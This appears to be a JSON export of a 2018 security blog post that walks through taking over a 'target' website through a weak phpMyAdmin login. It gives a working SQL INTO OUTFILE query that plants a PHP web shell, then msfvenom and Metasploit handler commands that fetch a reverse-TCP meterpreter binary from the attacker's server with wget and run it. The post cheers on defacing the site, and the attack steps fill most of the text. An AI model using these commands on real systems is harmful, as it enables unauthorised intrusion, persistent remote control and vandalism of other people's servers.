{"id":98,"date":"2018-12-16T07:28:21","date_gmt":"2018-12-16T07:28:21","guid":{"rendered":"https:\/\/mrjsec.co.uk\/blog\/?p=98"},"modified":"2019-03-08T18:17:27","modified_gmt":"2019-03-08T18:17:27","slug":"backdoor-with-phpmyadmin","status":"publish","type":"post","link":"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/","title":{"rendered":"<center>Backdoor with phpMyAdmin<\/center>"},"content":{"rendered":"\n<p style=\"text-align:center\">\u201cScenario\u201d So, you found your\u201ctargets\u201d website, but you notice it isn\u2019t much you can work with here. Using a URL Fuzzer, you found a \u201cphpMyAdmin\u201d path and surprisingly the admin used a weak password (Or some other method).<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"99\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/target\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/target.png?fit=687%2C499&amp;ssl=1\" data-orig-size=\"687,499\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"target\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/target.png?fit=687%2C499&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/target.png?resize=418%2C301&#038;ssl=1\" alt=\"\" class=\"wp-image-99\" width=\"418\" height=\"301\"\/><\/figure><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"blob:https:\/\/mrjsec.co.uk\/46e5a657-076e-450e-9360-52fb12664d52\" alt=\"\"\/><\/figure>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"101\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/phplogin-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/phplogin-1.png?fit=472%2C560&amp;ssl=1\" data-orig-size=\"472,560\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"phplogin\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/phplogin-1.png?fit=472%2C560&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/phplogin-1.png?resize=327%2C388&#038;ssl=1\" alt=\"\" class=\"wp-image-101\" width=\"327\" height=\"388\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/phplogin-1.png?w=472&amp;ssl=1 472w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/phplogin-1.png?resize=253%2C300&amp;ssl=1 253w\" sizes=\"auto, (max-width: 327px) 100vw, 327px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">You\u2019re logged into phpMyAdmin with the administrator account, head over to the SQL Tab \u201cThis will let you run SQL query\/queries on the server\u201dand use this code \u201cOr any code of your choice!\u201d and press go.<\/p>\n\n\n\n<ul class=\"wp-block-gallery aligncenter columns-2 is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\"><li class=\"blocks-gallery-item\"><figure><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"197\" data-attachment-id=\"107\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/dumpcode2-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode2-1.png?fit=705%2C198&amp;ssl=1\" data-orig-size=\"705,198\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"dumpcode2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode2-1.png?fit=700%2C197&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode2-1.png?resize=700%2C197&#038;ssl=1\" alt=\"\" data-id=\"107\" data-link=\"https:\/\/mrjsec.co.uk\/blog\/?attachment_id=107\" class=\"wp-image-107\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode2-1.png?resize=700%2C197&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode2-1.png?resize=300%2C84&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode2-1.png?w=705&amp;ssl=1 705w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"394\" data-attachment-id=\"108\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/dumpcode-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode-1.png?fit=944%2C532&amp;ssl=1\" data-orig-size=\"944,532\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"dumpcode\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode-1.png?fit=700%2C394&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode-1.png?resize=700%2C394&#038;ssl=1\" alt=\"\" data-id=\"108\" data-link=\"https:\/\/mrjsec.co.uk\/blog\/?attachment_id=108\" class=\"wp-image-108\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode-1.png?resize=700%2C394&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode-1.png?resize=300%2C169&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode-1.png?resize=768%2C433&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/dumpcode-1.png?w=944&amp;ssl=1 944w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/li><\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT \"&lt;?php echo '&lt;pre>';echo shell_exec($_REQUEST['mrjsec']);echo '&lt;\/pre>'; ?>\"\nINTO OUTFILE '\/var\/www\/html\/name.php'<\/code><\/pre>\n\n\n\n<p style=\"text-align:center\">Now go to your .php file (URL Wise) in this scenario I have named it name.php<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"563\" height=\"44\" data-attachment-id=\"113\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/url\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/url.png?fit=563%2C44&amp;ssl=1\" data-orig-size=\"563,44\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"url\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/url.png?fit=563%2C44&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/url.png?resize=563%2C44&#038;ssl=1\" alt=\"\" class=\"wp-image-113\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/url.png?w=563&amp;ssl=1 563w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/url.png?resize=300%2C23&amp;ssl=1 300w\" sizes=\"auto, (max-width: 563px) 100vw, 563px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">You won\u2019t see anything on this page \u201cthat\u2019s normal, were all empty inside!\u201d, Now here\u2019s the magic part. At the end of the .php URL path add this \u201c?mrjsec=*Your command here*, now you have a shell within the server, where you can call commands such as ls, whoami, rm, wget and so on etc.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" data-attachment-id=\"114\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/phpco1\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/phpco1.png?fit=459%2C1001&amp;ssl=1\" data-orig-size=\"459,1001\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"phpco1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/phpco1.png?fit=459%2C1001&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/phpco1.png?resize=253%2C551&#038;ssl=1\" alt=\"\" class=\"wp-image-114\" width=\"253\" height=\"551\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/phpco1.png?w=459&amp;ssl=1 459w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/phpco1.png?resize=138%2C300&amp;ssl=1 138w\" sizes=\"auto, (max-width: 253px) 100vw, 253px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">And from here you can even deface the site if that\u2019s what you want. And that ends that!<\/p>\n\n\n\n<p style=\"text-align:center\">Or maybe you want to go further and get a Metasploit reverse TCP shell on the system itself?<\/p>\n\n\n\n<p style=\"text-align:center\">Now we&#8217;re taking! First, we need to identify what operating system is running could be Linux or windows. However, in this scenario it\u2019s Linux, and you can find this out by merely performing \u201c?mrjsec=uname &#8211; this return \u201cLinux4.4.0-140-generic x86_64 x86_64 x86_64 GNU\/Linux\u201d.<\/p>\n\n\n\n<p style=\"text-align:center\">Now it\u2019s time to craft the Metasploit payload using msfvenom if you\u2019re unsure what payload you\nwould need just run \u201cmsfvenom &#8211;list\npayloads\u201d this will show all the available payloads, just pick the one you\nneed.<\/p>\n\n\n\n<p style=\"text-align:center\">\u201cSince this scenario is basedaround Linux, I will keep it Linux based, just remember there are so many different opportunities. Always think outside the box!\u201d<\/p>\n\n\n\n<p style=\"text-align:center\">Create the payload you need. <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=.31 LPORT=5721 -f elf > file<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"104\" data-attachment-id=\"116\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/createdpayload\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/createdpayload.png?fit=925%2C137&amp;ssl=1\" data-orig-size=\"925,137\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"createdpayload\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/createdpayload.png?fit=700%2C104&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/createdpayload.png?resize=700%2C104&#038;ssl=1\" alt=\"\" class=\"wp-image-116\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/createdpayload.png?resize=700%2C104&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/createdpayload.png?resize=300%2C44&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/createdpayload.png?resize=768%2C114&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/createdpayload.png?w=925&amp;ssl=1 925w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">Now you will need to upload it somewhere that offers direct downloading, in this scenario the attacker has apache2 installed and will be hosting the file from their own server.<\/p>\n\n\n\n<p style=\"text-align:center\">Go back to the target and using the first shell, we will use wget to get our shell onto the system. <\/p>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"437\" height=\"129\" data-attachment-id=\"117\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/fileonserver\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/fileonserver.png?fit=437%2C129&amp;ssl=1\" data-orig-size=\"437,129\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"fileonserver\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/fileonserver.png?fit=437%2C129&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/fileonserver.png?resize=437%2C129&#038;ssl=1\" alt=\"\" class=\"wp-image-117\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/fileonserver.png?w=437&amp;ssl=1 437w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/fileonserver.png?resize=300%2C89&amp;ssl=1 300w\" sizes=\"auto, (max-width: 437px) 100vw, 437px\" \/><\/figure>\n\n\n\n<p style=\"text-align:center\">Using the \u201cls\u201d command we can see the file is in place, now\nwe just need to make it executable simply by using chmod<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>name.php?mrjsec=chmod +x file<\/code><\/pre>\n\n\n\n<p style=\"text-align:center\">Before we even run the file, let\u2019s make sure our Metasploit handler is running and configured correctly.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msfconsole<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>use exploit\/multi\/handler<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"555\" height=\"421\" data-attachment-id=\"119\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/loadupms\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/loadupms.png?fit=555%2C421&amp;ssl=1\" data-orig-size=\"555,421\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"loadupms\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/loadupms.png?fit=555%2C421&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/loadupms.png?resize=555%2C421&#038;ssl=1\" alt=\"\" class=\"wp-image-119\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/loadupms.png?w=555&amp;ssl=1 555w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/loadupms.png?resize=300%2C228&amp;ssl=1 300w\" sizes=\"auto, (max-width: 555px) 100vw, 555px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">And don\u2019t forget to set the Payload, LHOST and RHOST!<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>set payload linux\/x86\/meterpreter\/reverse_tcp<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>set LHOST .31<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>set LPORT 5721<\/code><\/pre>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"544\" data-attachment-id=\"118\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/msfready\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/msfready.png?fit=842%2C654&amp;ssl=1\" data-orig-size=\"842,654\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"msfready\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/msfready.png?fit=700%2C544&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/msfready.png?resize=700%2C544&#038;ssl=1\" alt=\"\" class=\"wp-image-118\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/msfready.png?resize=700%2C544&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/msfready.png?resize=300%2C233&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/msfready.png?resize=768%2C597&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/msfready.png?w=842&amp;ssl=1 842w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">You can use \u201cshow options\u201d this will show you what settings\nare required for this payload (or any others.)<\/p>\n\n\n\n<p style=\"text-align:center\">Now just run exploit, and we can leave it. Or if you wish to background it just\ndo exploit -j<\/p>\n\n\n\n<p style=\"text-align:center\">Back onto the targets site, we just need to run the file. From the URL we import \u201c.\/file\u201d and that\u2019s it.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"470\" height=\"135\" data-attachment-id=\"120\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/running-file\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/running-file..png?fit=470%2C135&amp;ssl=1\" data-orig-size=\"470,135\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"running file.\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/running-file..png?fit=470%2C135&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/running-file..png?resize=470%2C135&#038;ssl=1\" alt=\"\" class=\"wp-image-120\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/running-file..png?w=470&amp;ssl=1 470w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/running-file..png?resize=300%2C86&amp;ssl=1 300w\" sizes=\"auto, (max-width: 470px) 100vw, 470px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">And if we head back toour Metasploit, we can see our file was a success, and we now have a better foothold within the system. What you do from here is your business.<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"700\" height=\"371\" data-attachment-id=\"121\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/end\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/end.png?fit=946%2C501&amp;ssl=1\" data-orig-size=\"946,501\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"end\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/end.png?fit=700%2C371&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/end.png?resize=700%2C371&#038;ssl=1\" alt=\"\" class=\"wp-image-121\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/end.png?resize=700%2C371&amp;ssl=1 700w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/end.png?resize=300%2C159&amp;ssl=1 300w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/end.png?resize=768%2C407&amp;ssl=1 768w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/end.png?w=946&amp;ssl=1 946w\" sizes=\"auto, (max-width: 700px) 100vw, 700px\" \/><\/figure><\/div>\n\n\n\n<p style=\"text-align:center\">But for me\u2026 I think a better-looking homepage is needed!<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"395\" height=\"110\" data-attachment-id=\"122\" data-permalink=\"https:\/\/mrjsec.co.uk\/blog\/backdoor-with-phpmyadmin\/deface\/\" data-orig-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/deface.png?fit=395%2C110&amp;ssl=1\" data-orig-size=\"395,110\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"deface\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/deface.png?fit=395%2C110&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/deface.png?resize=395%2C110&#038;ssl=1\" alt=\"\" class=\"wp-image-122\" srcset=\"https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/deface.png?w=395&amp;ssl=1 395w, https:\/\/i0.wp.com\/mrjsec.co.uk\/blog\/wp-content\/uploads\/2018\/12\/deface.png?resize=300%2C84&amp;ssl=1 